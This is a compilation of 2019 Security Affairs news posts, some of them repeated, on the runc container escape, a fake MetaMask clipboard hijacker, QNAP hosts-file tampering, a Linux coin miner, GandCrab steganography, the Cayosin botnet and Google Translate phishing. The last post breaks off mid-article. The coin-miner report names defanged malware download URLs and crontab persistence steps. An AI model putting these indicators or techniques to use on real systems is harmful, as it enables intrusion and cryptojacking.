Aleksa Sarai, a senior software engineer at SUSE Linux GmbH, has disclosed a serious vulnerability tracked CVE-2019-5736 affecting runc, the default container runtime for Docker, containerd, Podman, and CRI-O.

The vulnerability was discovered by the security researchers Adam Iwaniuk and Borys Popławski.

Such kind of vulnerabilities could have a significant impact on an IT environment, its exploitation could potentially escape containment, impacting the entire container host, ultimately compromising the hundreds-to-thousands of other containers running on it

“The disclosure of a security flaw (CVE-2019-5736) in runc and docker illustrates a bad scenario for many IT administrators, managers, and CxOs.” reads a blog post. published by Red Hat.

“While there are very few incidents that could qualify as a doomsday scenario for enterprise IT, a cascading set of exploits affecting a wide range of interconnected production systems qualifies…and that’s exactly what this vulnerability represents,”

“The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host.” Sarai wrote in a post to the OpenWall mailing list.

“The level of user interaction is being able to run any command (it doesn’t matter if the command is not attacker-controlled) as root within a container in either of these contexts:

  • Creating a new container using an attacker-controlled image.
  • Attaching (docker exec) into an existing container which the attacker had previous write access to.”

Sarai, which is one of the maintainers of runc, has pushed a git commit to address the vulnerability, but all the project built on runc need to include the changes.

Docker released the v18.09.2 version to address the issue, but according to the experts, thousands of Docker daemons exposed online are still vulnerable, most of them in the US and China.

runc dockers

Default configurations of Red Hat Enterprise Linux and Red Hat OpenShift are protected, Linux distros Debian and Ubuntu are working to address the issue. Both Google Cloud and AWS published security advisories to recommend customers to update containers on affected services.

Pierluigi Paganini

(SecurityAffairs – runc, hacking)

.

The post Docker runc flaw opens the door to a ‘Doomsday scenario’ appeared first on Security Affairs.

MetaMask app on Google Play was a Clipboard Hijacker

Security researcher Lukas Stefanko from ESET discovered the first Android cryptocurrency clipboard hijacker impersonating MetaMask on the official Google Play store.

The rogue MetaMask app is a Clipboard Hikacker that monitors a device’s clipboard for Bitcoin and Ethereum addresses and replaces them with addresses of wallets under the control of the attacker. Using this trick the attackers can transfers funds to their wallets.

“This dangerous form of malware first made its rounds in 2017 on the Windows platform and was spotted in shady Android app stores in the summer of 2018. In February 2019, we discovered a malicious clipper on Google Play, the official Android app store.” reads the post published by ESET.

MetaMask clipboard hijacker

The Clipboard Hikacker poses itself as a mobile version of the legitimate service
MetaMask.io which is designed to run Ethereum decentralized apps in a browser, without having to run a full Ethereum node.

However, the legitimate service currently does not offer a mobile app.

Lukas Stefanko discovered that the app was able to steal cryptocurrency using two different attack methods.

The first attack scenario sees attackers using the app to attempt to steal the private keys and seeds of an Ethereum wallet when a user adds it to the app. Once the attackers obtain this data send it to a Telegram account.

The second attack scenario sees attackers monitoring the clipboard for Ethereum and Bitcoin addresses, and when one is detected, replace it with the attackers’ address.

In June 2017, security researchers from Qihoo 360 Total Security spotted a new malware campaign spreading a clipboard hijacker, tracked as ClipboardWalletHijacker, that infected over 300,000 computers. Most of the victims are located in Asia, mainly China.

In July 2017, a CryptoCurrency Clipboard Hijackers was discovered by BleepingComputer while monitoring more than 2.3 million addresses.

In March 2018, security researchers at Palo Alto Networks, spotted a strain of malware dubbed ComboJack that is able of detecting when users copy a cryptocurrency address to the Windows clipboard. The malicious code then replaces the address in the clipboard with the author’s one.

Pierluigi Paganini

(SecurityAffairs – Clipboard Hikacker, MetaMask)

The post MetaMask app on Google Play was a Clipboard Hijacker appeared first on Security Affairs.

A mysterious code prevents QNAP NAS devices to be updated

Users of QNAP NAS devices are reporting through QNAP forum discussions of mysterious code that adds some entries that prevent software update.

Users of the Network attached storage devices manufactured have reported a mystery string of malware attacks that disabled software updates by hijacking entries in host machines’ hosts file.

According to the users, the malicious code adds some 700 entries to the /etc/hosts file that redirects requests to IP address 0.0.0.0.

QNAP TS-253A

The user ianch99 in the QNAP NAS community forum reported that the antivirus ClamAV was failing to update due to 0.0.0.0 clamav.net host file entries.

“Since recent firmware updates, the ClamAV Antivirus fails to update due to 700+ clamav.net entries in /etc/hosts, all set to 0.0.0.0 e.g.” wrote
the user ianch99.

“0.0.0.0 bugs.clamav.net
0.0.0.0 current.cvd.clamav.net
0.0.0.0 database.clamav.net
0.0.0.0 db.local.clamav.net
0.0.0.0 update.nai.com
0.0.0.0 db.ac.clamav.net
0.0.0.0 db.ac.ipv6.clamav.net
0.0.0.0 db.ac.big.clamav.net
<snip>

As they are all set to 0.0.0.0, the ClamAV update fails. If you remove these entries, the update runs fine but they return on after rebooting.”

Other users reported similar problems with the MalwareRemover, but it is still unclear if the events are linked.

QNAP provided a script that could help users to restore normal operations deleting the mysterious entries.

QNAP hasn’t confirmed that the incidents were caused by a malware.

“Exposing your NAS on the internet (allowing remote access) is always a high risk thing to do (at least without a properly deployed remote access VPN and/or 2FA on all existing user accounts)!” wrote the user P3R.

“The real problems that I see with Qnap are:

  • The marketing is pushing the private cloud message and tell users that the Qnap solution is a secure way to deploy it. Unfortunately the first part is very attractive to users that doesn’t understand the risks and the last part is a lie.
  • Qnap have many dangerous things enabled by default and/or without sufficient warnings about the risks.”

Pierluigi Paganini

(SecurityAffairs – NAS, hacking)

The post A mysterious code prevents QNAP NAS devices to be updated appeared first on Security Affairs.

Adiantum will bring encryption on Android devices without cryptographic acceleration

Google announced Adiantum, a new encryption method devised to protect Android devices without cryptographic acceleration.

Google announced Adiantuma new encryption method devised to protect Android devices without cryptographic acceleration.

“Adiantum is an innovation in cryptography designed to make storage encryption more efficient for devices without cryptographic acceleration, to ensure that all devices can be encrypted.” reads the announcement published by Google.

Since Android version 6.0, user data are protected with Advanced Encryption Standard (AES) encryption, however, the feature is slow on mobile devices using low-end processors that haven’t hardware to support it.

The new encryption form has been created for devices running Android 9 and higher that doesn’t support AES CPU instructions.

For this reason, Google developed Adiantum that supports the ChaCha stream cipher in a length-preserving mode.
ChaCha allows improving security and performance in the absence of dedicated hardware acceleration.

Google experts pointed out that Adiantum encryption/decryption processes on ARM Cortex-A7 processors are around five times faster compared to AES-256-XTS.

Adiantum performance

“Unlike modes such as XTS or CBC-ESSIV, Adiantum is a true wide-block mode: changing any bit anywhere in the plaintext will unrecognizably change all of the ciphertext, and vice versa.  It works by first hashing almost the entire plaintext,” continues Google.

“We also hash a value called the “tweak” which is used to ensure that different sectors are encrypted differently. This hash is then used to generate a nonce for the ChaCha encryption. After encryption, we hash again, so that we have the same strength in the decryption direction as the encryption direction”  

Adiantum could represent the optimal solution for a wide range of devices that haven’t dedicated hardware for encryption, such as smartwatches, smart TVs, and other IoT devices running on Android OS.

“Our hope is that Adiantum will democratize encryption for all devices. Just like you wouldn’t buy a phone without text messaging, there will be no excuse for compromising security for the sake of device performance.”
wrote Eugene Liderman, Director of Mobile Security Strategy, Android Security & Privacy Team, says. 

“Everyone should have privacy and security, regardless of their phone’s price tag,”

Google published technical details about the new encryption form in the paper titled “Adiantum: length-preserving encryption for entry-level processors.”

Pierluigi Paganini

(SecurityAffairs – Android, encryption)

The post Adiantum will bring encryption on Android devices without cryptographic acceleration appeared first on Security Affairs.

Security Affairs: Google open sourced the ClusterFuzz fuzzing platform

Google has open sourced ClusterFuzz, its fuzzing infrastructure it has developed to find memory corruption vulnerabilities in Chrome.

Google has open sourced its fuzzing infrastructure ClusterFuzz that the tech giant developed to find memory corruption bugs in the Chrome browser.

ClusterFuzz is a scalable fuzzing tool that can run on clusters with more than 25,000 cores.

The platform has been available as a free service to open source projects through the OSS-Fuzz service. 

Fuzzing is an automated method for detecting bugs in software that works by feeding unexpected inputs to a target program. It is effective at finding memory corruption bugs, which often have serious security implications.” reads a blog post published by Google.

“Manually finding these issues is both difficult and time consuming, and bugs often slip through despite rigorous code review practices. For software projects written in an unsafe language such as C or C++, fuzzing is a crucial part of ensuring their security and stability.”

The fuzzing test methodology is effective in detecting bugs in software on a large scale, especially when it is directly integrated with the development process.

ClusterFuzz was created more than 8 years ago to provide end-to-end automation, from bug detection, to triage (accurate deduplication, bisection), to bug reporting, and finally to automatic closure of bug reports.

Google confirmed that to date, ClusterFuzz discovered over 16,000 vulnerabilities in Chrome and more than 11,000 vulnerabilities across more than 160 open source projects integrated with OSS-Fuzz.

“It is an integral part of the development process of Chrome and many other open source projects. ClusterFuzz is often able to detect bugs hours after they are introduced and verify the fix within a day.” continues the blog post.

“Check out our GitHub repository. You can try ClusterFuzz locally by following these instructions.”

ClusterFuzz

ClusterFuzz can be also installed locally on a computer cluster.

Pierluigi Paganini

(SecurityAffairs – ClusterFuzz, hacking)

The post Google open sourced the ClusterFuzz fuzzing platform appeared first on Security Affairs.



Security Affairs

Google open sourced the ClusterFuzz fuzzing platform

Google has open sourced ClusterFuzz, its fuzzing infrastructure it has developed to find memory corruption vulnerabilities in Chrome.

Google has open sourced its fuzzing infrastructure ClusterFuzz that the tech giant developed to find memory corruption bugs in the Chrome browser.

ClusterFuzz is a scalable fuzzing tool that can run on clusters with more than 25,000 cores.

The platform has been available as a free service to open source projects through the OSS-Fuzz service. 

Fuzzing is an automated method for detecting bugs in software that works by feeding unexpected inputs to a target program. It is effective at finding memory corruption bugs, which often have serious security implications.” reads a blog post published by Google.

“Manually finding these issues is both difficult and time consuming, and bugs often slip through despite rigorous code review practices. For software projects written in an unsafe language such as C or C++, fuzzing is a crucial part of ensuring their security and stability.”

The fuzzing test methodology is effective in detecting bugs in software on a large scale, especially when it is directly integrated with the development process.

ClusterFuzz was created more than 8 years ago to provide end-to-end automation, from bug detection, to triage (accurate deduplication, bisection), to bug reporting, and finally to automatic closure of bug reports.

Google confirmed that to date, ClusterFuzz discovered over 16,000 vulnerabilities in Chrome and more than 11,000 vulnerabilities across more than 160 open source projects integrated with OSS-Fuzz.

“It is an integral part of the development process of Chrome and many other open source projects. ClusterFuzz is often able to detect bugs hours after they are introduced and verify the fix within a day.” continues the blog post.

“Check out our GitHub repository. You can try ClusterFuzz locally by following these instructions.”

ClusterFuzz

ClusterFuzz can be also installed locally on a computer cluster.

Pierluigi Paganini

(SecurityAffairs – ClusterFuzz, hacking)

The post Google open sourced the ClusterFuzz fuzzing platform appeared first on Security Affairs.

Security Affairs: New Linux coin miner kills competing malware to maximize profits

Security experts from Trend Micro have discovered a new strain of coin miner that targets the Linux platform and installs the XMR-Stak Cryptonight cryptocurrency miner.

Security experts from Trend Micro have discovered a new strain of coin miner that targets the Linux platform and installs the XMR-Stak Cryptonight cryptocurrency miner, researchers observed it killing other Linux malware and coin miners present on the infected machine.

coin miner linux-deletes-other-malware_1

The experts detected a coinminer script on one of their honeypots and, the malicious code shares some parts with the Xbash malware and the KORKERDS cryptocurrency miner that leverages rootkit to avoid detection.

“We found the script capable of deleting a number of known Linux malware, coin miners, and connections to other miner services and ports, and we observed some parts of the script to be reminiscent of Xbash features and KORKERDS.” reads the analysis published by Trend Micro.

“It installs a cryptocurrency-mining malware as well as implant itself into the system and crontabs to survive reboots and deletions.”

Experts noticed that this specific variant of KORKERDS leverages the rootkit to download a binary of a modified version of a universal Stratum XMR-Stak pool miner.

According to the experts, the infection started from some IP cameras and web services via TCP port 8161, where the attacker attempts to upload a crontab file.

The crontab file allows to launch a second stage that implements the following three functions:

  • Function B kills previously installed malware, coin miners, and all related services referenced to an accompanying malware (detected by Trend Micro as SH.MALXMR.UWEIU). It also creates new directories, files, and stop processes with connections to identified IP addresses.
  • Function D downloads the coin miner binary from hxxp://yxarsh.shop/64 and runs it.
  • Function C downloads a script from hxxp://yxarsh.shop/0, saves it to /usr/local/bin/dns file, and creates a new crontab to call this script at 1 a.m. It also downloads hxxp://yxarsh.shop/1.jpg and puts it in different crontabs.

The malware attempts to hide its presence by clearing system logs and achieve persistence using implanted crontab files.

Compared to the original KORKERDS cryptocurrency miner, the new script improved the way it downloads and executes the files. It inserts a single crontab that fetches all the code and the miner component.

“While a malware routine that includes the removal of other malware in the system is not new, we’ve never seen the removal of Linux malware from the system on this scale. Removing competing malware is just one way cybercriminals are maximizing their profit.” concludes Trend Micro.

Further details, including indicators of compromise, are reported in the analysis published by Trend Micro.

Pierluigi Paganini

(SecurityAffairs – coin miner, malware)

The post New Linux coin miner kills competing malware to maximize profits appeared first on Security Affairs.



Security Affairs

New Linux coin miner kills competing malware to maximize profits

Security experts from Trend Micro have discovered a new strain of coin miner that targets the Linux platform and installs the XMR-Stak Cryptonight cryptocurrency miner.

Security experts from Trend Micro have discovered a new strain of coin miner that targets the Linux platform and installs the XMR-Stak Cryptonight cryptocurrency miner, researchers observed it killing other Linux malware and coin miners present on the infected machine.

coin miner linux-deletes-other-malware_1

The experts detected a coinminer script on one of their honeypots and, the malicious code shares some parts with the Xbash malware and the KORKERDS cryptocurrency miner that leverages rootkit to avoid detection.

“We found the script capable of deleting a number of known Linux malware, coin miners, and connections to other miner services and ports, and we observed some parts of the script to be reminiscent of Xbash features and KORKERDS.” reads the analysis published by Trend Micro.

“It installs a cryptocurrency-mining malware as well as implant itself into the system and crontabs to survive reboots and deletions.”

Experts noticed that this specific variant of KORKERDS leverages the rootkit to download a binary of a modified version of a universal Stratum XMR-Stak pool miner.

According to the experts, the infection started from some IP cameras and web services via TCP port 8161, where the attacker attempts to upload a crontab file.

The crontab file allows to launch a second stage that implements the following three functions:

  • Function B kills previously installed malware, coin miners, and all related services referenced to an accompanying malware (detected by Trend Micro as SH.MALXMR.UWEIU). It also creates new directories, files, and stop processes with connections to identified IP addresses.
  • Function D downloads the coin miner binary from hxxp://yxarsh.shop/64 and runs it.
  • Function C downloads a script from hxxp://yxarsh.shop/0, saves it to /usr/local/bin/dns file, and creates a new crontab to call this script at 1 a.m. It also downloads hxxp://yxarsh.shop/1.jpg and puts it in different crontabs.

The malware attempts to hide its presence by clearing system logs and achieve persistence using implanted crontab files.

Compared to the original KORKERDS cryptocurrency miner, the new script improved the way it downloads and executes the files. It inserts a single crontab that fetches all the code and the miner component.

“While a malware routine that includes the removal of other malware in the system is not new, we’ve never seen the removal of Linux malware from the system on this scale. Removing competing malware is just one way cybercriminals are maximizing their profit.” concludes Trend Micro.

Further details, including indicators of compromise, are reported in the analysis published by Trend Micro.

Pierluigi Paganini

(SecurityAffairs – coin miner, malware)

The post New Linux coin miner kills competing malware to maximize profits appeared first on Security Affairs.

Security Affairs newsletter Round 200 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

Can Enterprises execute a GRC Movement?
Experts observed a new sextortion scam Xvideos-themed
Hacker who reported a flaw in Hungarian Magyar Telekom faces up to 8-years in jail
Experts found popular beauty apps in the Play Store including malicious code
Metro Bank is the first bank that disclosed SS7 attacks against its customers
QuadrigaCX exchange lost access to $145 Million funds after founder dies
Security firm Recorded Future discovered the hacker behind Collection #1
Young hacker gets 10 years jail sentence for SIM Swapping attacks
Roughly 500,000 Ubiquiti devices may be affected by flaw already exploited in the wild
Roughly 500,000 Ubiquity devices may be affected by flaw already exploited in the wild
Severe bug in LibreOffice and OpenOffice suites allows remote code execution
SpeakUp Linux Backdoor targets Linux servers in East Asia and LATAM.
A critical counterfeiting vulnerability addressed in Zcash
New ExileRAT backdoor used in attacks aimed at users in Tibet
Reverse RDP Attack – Rogue RDP Server can be used to hack RDP clients
Security expert Marco Ramilli released for free the Malware Hunter tool
Android devices could be hacked by viewing a malicious PNG Image
Expert publicly disclosed the existence of 0day flaw in macOS Mojave
Ursnif: Long Live the Steganography and AtomBombing!
Hackers broke into Australias Parliament Computer Network
NITEC19 – NATO Opens Defense Innovation Challenge calls for C4ISR solutions
Phishing campaign leverages Google Translate as camouflage
Three out of the four flaws fixed with iOS 12.1.4 were exploited in the wild
Vulnerabilities in Kunbus Industrial Gateway allows to control the devices
Exclusive – MalwareMustDie Team analyzed the Cayosin Botnet and its criminal ecosystem
GandCrab ransomware campaign targets Italy using steganography

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 200 – News of the week appeared first on Security Affairs.

GandCrab ransomware campaign targets Italy using steganography

A newly discovered malware campaign leverages steganography to hide GandCrab ransomware in an apparently innocent Mario image.

Security experts at Bromium have discovered a malware campaign using steganography to hide the GandCrab ransomware in a Mario graphic package.

According to Matthew Rowan, a researcher at Bromium, threat actors use steganography to hide the malicious code and avoid AV detection.

The steganography is used in conjunction with heavily obfuscated Microsoft PowerShell commands that attackers have hidden within the color channels of a picture of Mario, in a particularly manipulating
blue and green pixels.

Steganographic techniques such as using the low-bits from pixel values are clearly not new, but it’s rare that we see this kind of thing in malspam; even at Bromium, where we normally see slightly more advanced malware that evaded the rest of the endpoint security stack.” reads the analysis published by Rowan.

“A manual re-shuffle to de-obfuscate the code and you can see more clearly the bitwise operation on the blue and green pixels. Since only the lower 4 bits of blue and green have been used, this won’t make a big difference to the image when looked at by a human, but it is quite trivial to hide some code within.”

This technique makes the threat hard to be detected by firewall and other defence systems.

Experts pointed out that attackers are targeting users in Italy, but the campaign will likely extend to other countries worldwide.

“The manually de-obfuscated PowerShell reveals the final level which is dropping and executing from a site, but only if the output of ‘get-culture’ on the machine matches “ita” (for example if the culture is Italian, which matches the earlier targeting attempts).” continues the expert.

steganography campaign.png

Experts were able to download the samples from the address in the de-obfuscated Powershell, including from an Italy-based VPN, and discovered several samples of the Gandcrab ransomware.

Additional details, including IoCs are reported in the analysis published by the security firm Bromium

Pierluigi Paganini

(SecurityAffairs – steganography, hacking)


The post GandCrab ransomware campaign targets Italy using steganography appeared first on Security Affairs.

Exclusive – MalwareMustDie Team analyzed the Cayosin Botnet and its criminal ecosystem

Cayosin Botnet: a deeper look at this threat supported by the psychological profile of the “youngsters-wannabe-hackers” Rolex boasters

Cayosin Botnet

Money, botnet as service business and coding on the dark side of the life: “At this point of my life… if it doesn’t make me money, I don’t make time for it”, is stated in the picture below.

Or elsewhere the same threat actor pronounces a more blatantly made statement in a sentence that sounds like “I am not scared by the death, I am scared more to not live a pleasant life.”

Cayosin Botnet
Image downloaded by Odisseus
from the Instagram profile of the threat actor

This is the “new” motto of those youngsters-wannabe-hackers: botnet providers, sellers, coders, “boaters” driving in the night with the laptop ever connected aside. In the imaginary world of a teen the adults world becomes a violent jungle dominated by the dark colors of the delirium of omnipotence.  Botnet, packet flooding, bots, power of attack: “I don’t care how many and what bots I have, all I care is only to have stable stress power”.

It is in this psychedelic context that the Cayosin botnet has seen the light and for the first time has been reversed and analyzed (the report is here) by “unixfreaxjp” from the MalwareMustDie team. 

The analysis is sapient and clear: in the reversed samples there are many traces of a collection of attacks that lead to a collection of different source codes.

One of them is the Layer 7 (HTTP) Attack reported in the picture below documenting how this kind of malware can evade the anti-DDoS solutions like Cloudfare.

Cayosin Botnet

From the unixfreaxjp’s Cayosin botnet binary analysis we can understand that the core of the artifact is the “integration” of different botnet source codes, as it is also well documented by reading the now deleted Instagram profile of the 13 years old scriptbots/unholdable, who implemented this Botnet . STD attack, Tsunami, Christmas DDoS attacks were adapted from Kaiten botnet, along with more flood combination taken from Qbot/Lizkebab/Torlus/Gafgyt variants: multiple attack methods integrating multiple source code in the same artifact and provided a “As a Service” to other teens or threat actors and sold offhandedly on Instagram. From Mirai source code the Cayosin was taken the table scheme to hide strings used by the botnet to hack the login credential of the vulnerable telnet accounts for known IOT devices, along with other Mirai botnet functionalities. Obviously, the coder was not updating much feature of the C2 which explains how the base protocol of the botnet is still made by Qbot/Torlus basis.

A ready-to-use botnet build to be sold for $20 a month, “full options” on sale with an expiry token and functionalities that were able to ban the users who didn’t renew the expired “licence”.

The combination of more capabilities of the botnet has been well documented also by PERCH Security Threat Report who made a great analysis on it, confirming the combination of these functionalities used in Cayosin along with the deeper OSINT investigation of the threat source.

PERCH report states: “Cayosin largely recycles exploits utilized by other botnets, like Mirai, though the injections reference”, like GPON attack that was documented on the Instagram profile of the crew, so clearly that an external observer could have easily view of the day by day findings of new exploits  and methods then implemented in the malware to enrich  the harmful capability of the new “product”.

They candidly state this in their Instagram Stories: “New Methods, DM me if you want to know more.”

Cayosin Botnet

Image downloaded by Odisseus from the Instagram profile of the threat actor

PERCH has understood it well, in fact writes: “This is not the team’s first tool. They have created a few along the way like Summit, Tragic, and about a dozen others. You can learn more about these tools by following the various Instagram accounts of the crew. They seem interested in building tools to DDoS and boast about taking down services with OVH, Choopa, NFO – and if the hype is real, maybe even Rocket League servers.”

At this point is not excluded that Cayosin is only an evolution of many other botnets made always by the same threat actor (or crew) and in particular of the botnet named Messiah. In the following is reported the advertising of the Messiah botnet with its features which remember Cayosin botnet capabilities. Check the following exclusive image:

  • Features:  Admin of accounts, Add user commands, Kick user commands, Full chat, On line user list, Bot limits for account, Full bot type list, Port Scanner and Resolver
  • Methods: Reg UDP, Reg TCP, STD Hex, CNC Flood, Stomp Flood, Xmas and VSE
  • Replication Exploits: GPON, Telnet, Realtek, Tr064, Huawai
Cayosin Botnet

Image downloaded by Odisseus from the Instagram profile of the threat actor

What we learn from the evolving of botnets is the adaptation of the source codes, once one bad actor coder starts to implement something different and other actor coders find it useful, they adapt the capability by merging source codes. Each of coders and botnet provider is racing with others to present their technology of their botnet is better, to attract the market: Youngster and Actors who interest to rent the best service.

The conclusion is given by MalwareMustDie team, the group that we all know by of their struggle fighting along the years against botnet coders, through their public tweet in which is shown how this situation can be summarized by a simple fact: “Money”. The veteran DDoS botnet hackers are facilitating frameworks for surviving the DDoS ELF IoT botnet as the income engine: from coordination to each type of coders, linking DDoS-As-Service sites (known as Stressers or Bruters)  to providing the botnet control via API, then supplying infrastructure, assisting the newbies with setups, with all this effort these veterans are urging and provoking green and young actors to do their own botnets. The money scheme is following in these processes by first taking these youngster “weekly allowance”, then getting merit the botnets used by the rented “boaters” , till making profits from cuts taken from case by case with the arrangement of API used for Bruters/Stressers platform for the attackers that pays the service for DDoS”

In the end, this is all about the money circulation scheme that fuels the existence of the IoT botnet, their coders, their stressers behind them. The disrupting this money flow may give us a chance to disrupt this badness so strongly to force the scheme to the discontinuation.

Additional glossary:
*) boaters: they who uses the rented botnet
*) herders: they who herd botnet
*) stressers or bruters are the front end of DDoS-As-Service sites

About the Author: 

Odisseus – Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

unixfreaxjp” member of the MalwareMustDie team. 

Pierluigi Paganini

(SecurityAffairs – Cayosin Botnet, cybercrime)


The post Exclusive – MalwareMustDie Team analyzed the Cayosin Botnet and its criminal ecosystem appeared first on Security Affairs.

Security Affairs: Exclusive – MalwareMustDie Team analyzed the Cayosin Botnet and its criminal ecosystem

Cayosin Botnet: a deeper look at this threat supported by the psychological profile of the “youngsters-wannabe-hackers” Rolex boasters

Cayosin Botnet

Money, botnet as service business and coding on the dark side of the life: “At this point of my life… if it doesn’t make me money, I don’t make time for it”, is stated in the picture below.

Or elsewhere the same threat actor pronounces a more blatantly made statement in a sentence that sounds like “I am not scared by the death, I am scared more to not live a pleasant life.”

Cayosin Botnet
Image downloaded by Odisseus
from the Instagram profile of the threat actor

This is the “new” motto of those youngsters-wannabe-hackers: botnet providers, sellers, coders, “boaters” driving in the night with the laptop ever connected aside. In the imaginary world of a teen the adults world becomes a violent jungle dominated by the dark colors of the delirium of omnipotence.  Botnet, packet flooding, bots, power of attack: “I don’t care how many and what bots I have, all I care is only to have stable stress power”.

It is in this psychedelic context that the Cayosin botnet has seen the light and for the first time has been reversed and analyzed (the report is here) by “unixfreaxjp” from the MalwareMustDie team. 

The analysis is sapient and clear: in the reversed samples there are many traces of a collection of attacks that lead to a collection of different source codes.

One of them is the Layer 7 (HTTP) Attack reported in the picture below documenting how this kind of malware can evade the anti-DDoS solutions like Cloudfare.

Cayosin Botnet

From the unixfreaxjp’s Cayosin botnet binary analysis we can understand that the core of the artifact is the “integration” of different botnet source codes, as it is also well documented by reading the now deleted Instagram profile of the 13 years old scriptbots/unholdable, who implemented this Botnet . STD attack, Tsunami, Christmas DDoS attacks were adapted from Kaiten botnet, along with more flood combination taken from Qbot/Lizkebab/Torlus/Gafgyt variants: multiple attack methods integrating multiple source code in the same artifact and provided a “As a Service” to other teens or threat actors and sold offhandedly on Instagram. From Mirai source code the Cayosin was taken the table scheme to hide strings used by the botnet to hack the login credential of the vulnerable telnet accounts for known IOT devices, along with other Mirai botnet functionalities. Obviously, the coder was not updating much feature of the C2 which explains how the base protocol of the botnet is still made by Qbot/Torlus basis.

A ready-to-use botnet build to be sold for $20 a month, “full options” on sale with an expiry token and functionalities that were able to ban the users who didn’t renew the expired “licence”.

The combination of more capabilities of the botnet has been well documented also by PERCH Security Threat Report who made a great analysis on it, confirming the combination of these functionalities used in Cayosin along with the deeper OSINT investigation of the threat source.

PERCH report states: “Cayosin largely recycles exploits utilized by other botnets, like Mirai, though the injections reference”, like GPON attack that was documented on the Instagram profile of the crew, so clearly that an external observer could have easily view of the day by day findings of new exploits  and methods then implemented in the malware to enrich  the harmful capability of the new “product”.

They candidly state this in their Instagram Stories: “New Methods, DM me if you want to know more.”

Cayosin Botnet

Image downloaded by Odisseus from the Instagram profile of the threat actor

PERCH has understood it well, in fact writes: “This is not the team’s first tool. They have created a few along the way like Summit, Tragic, and about a dozen others. You can learn more about these tools by following the various Instagram accounts of the crew. They seem interested in building tools to DDoS and boast about taking down services with OVH, Choopa, NFO – and if the hype is real, maybe even Rocket League servers.”

At this point is not excluded that Cayosin is only an evolution of many other botnets made always by the same threat actor (or crew) and in particular of the botnet named Messiah. In the following is reported the advertising of the Messiah botnet with its features which remember Cayosin botnet capabilities. Check the following exclusive image:

  • Features:  Admin of accounts, Add user commands, Kick user commands, Full chat, On line user list, Bot limits for account, Full bot type list, Port Scanner and Resolver
  • Methods: Reg UDP, Reg TCP, STD Hex, CNC Flood, Stomp Flood, Xmas and VSE
  • Replication Exploits: GPON, Telnet, Realtek, Tr064, Huawai
Cayosin Botnet

Image downloaded by Odisseus from the Instagram profile of the threat actor

What we learn from the evolving of botnets is the adaptation of the source codes, once one bad actor coder starts to implement something different and other actor coders find it useful, they adapt the capability by merging source codes. Each of coders and botnet provider is racing with others to present their technology of their botnet is better, to attract the market: Youngster and Actors who interest to rent the best service.

The conclusion is given by MalwareMustDie team, the group that we all know by of their struggle fighting along the years against botnet coders, through their public tweet in which is shown how this situation can be summarized by a simple fact: “Money”. The veteran DDoS botnet hackers are facilitating frameworks for surviving the DDoS ELF IoT botnet as the income engine: from coordination to each type of coders, linking DDoS-As-Service sites (known as Stressers or Bruters)  to providing the botnet control via API, then supplying infrastructure, assisting the newbies with setups, with all this effort these veterans are urging and provoking green and young actors to do their own botnets. The money scheme is following in these processes by first taking these youngster “weekly allowance”, then getting merit the botnets used by the rented “boaters” , till making profits from cuts taken from case by case with the arrangement of API used for Bruters/Stressers platform for the attackers that pays the service for DDoS”

In the end, this is all about the money circulation scheme that fuels the existence of the IoT botnet, their coders, their stressers behind them. The disrupting this money flow may give us a chance to disrupt this badness so strongly to force the scheme to the discontinuation.

Additional glossary:
*) boaters: they who uses the rented botnet
*) herders: they who herd botnet
*) stressers or bruters are the frontend of DDoS-As-Service sites

About the Author: 

Odisseus – Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

unixfreaxjp” member of the MalwareMustDie team. 

Pierluigi Paganini

(SecurityAffairs – Cayosin Botnet, cybercrime)


The post Exclusive – MalwareMustDie Team analyzed the Cayosin Botnet and its criminal ecosystem appeared first on Security Affairs.



Security Affairs

NITEC19 – NATO Opens Defense Innovation Challenge calls for C4ISR solutions

The NATO Communications and Information Agency (NCI) announced the opening of the fourth annual Defense Innovation Challenge (NITEC19) to start-ups, SMEs and academia.

NITEC19 300x200

The Agency calls for proposals on solutions that could support NATO’s command, control, communications, computers, intelligence, surveillance and reconnaissance (C4ISR) and of course to improve cyber capabilities.

According to the official website, the challenge focuses on data science and natural language processing, for this reason, NATO Communications and Information Agency is accepting submissions in the following priority areas:

  • Data science tools and approaches for a) Natural Language Processing for semantics and sentiment analysis, or b) processing data from maritime environments;
  • Capabilities for sensing the maritime environment;
  • Solutions to the telecommunication challenges of the High North.

The challenge aims at accelerating transformational, state-of-the-art technology solutions from participants to support NATO’s C4ISR and improve its cyber capabilities.

“The NITEC innovation challenge,” said Mike Street, Head of innovation and data science at the NCI Agency, “is a great way for a wide range of companies and organizations to share their innovative products and services with the NCI Agency. It is one of the routes we use to ensure that NATO’s technology experts stay aware of how innovative technologies are being applied.”

The top ten proposals will be exposed in a 5-minute pitch presentation during the plenary session of the NITEC19 event. The winner will receive a
prize of 10 000 EUR, it will be also tasked of running a formal pilot with the NCI Agency to demonstrate their solution.

“We are seeking to broaden engagement with innovative technology drivers as NATO undergoes its largest technological modernization in decades,” said NCI Agency General Manager Kevin J. Scheid.

Proposals must be received by 22 March, and the Agency will announce the winners on 8 April.

Pierluigi Paganini

(SecurityAffairs – NITEC19, NATO)

The post NITEC19 – NATO Opens Defense Innovation Challenge calls for C4ISR solutions appeared first on Security Affairs.

Phishing campaign leverages Google Translate as camouflage

Crooks leverage Google Translate service as camouflage on mobile browsers in a phishing campaign aimed at stealing Google account and Facebook credentials.

The security expert Larry Cashdollar, a member of Akamai’s Security Intelligence Response Team (SIRT), discovered that cybercriminals are carrying out a new Phishing attack that leverages Google Translate as camouflage.

The phishing campaign targets both Google and Facebook accounts, the use of Google Translate allows the attackers to make the phishing page as a legitimate form from a Google domain. The technique makes it harder to detect the attack on mobile browsers.

These phishing emails pose as alerts sent by Google that inform users that their accounts were accessed from a new Windows device. The malicious emails come with a subject of “Security Alert,” they attempt to trick victims to click on the “Consult the activity” button to receive more information about the potential unauthorized access.

When a user clicks on the link embedded in the phishing message, he will be redirected to a Google Translate page that opens up a phishing page that appears to be a Google Account login. 

The expert pointed out that this kind of attack could be easily detected by users on desktop browsers because the Translate toolbar is visible.

On mobile browsers, it is much difficult to understand that the displayed page is the result of Google Translate because the interface of the service is minimal.

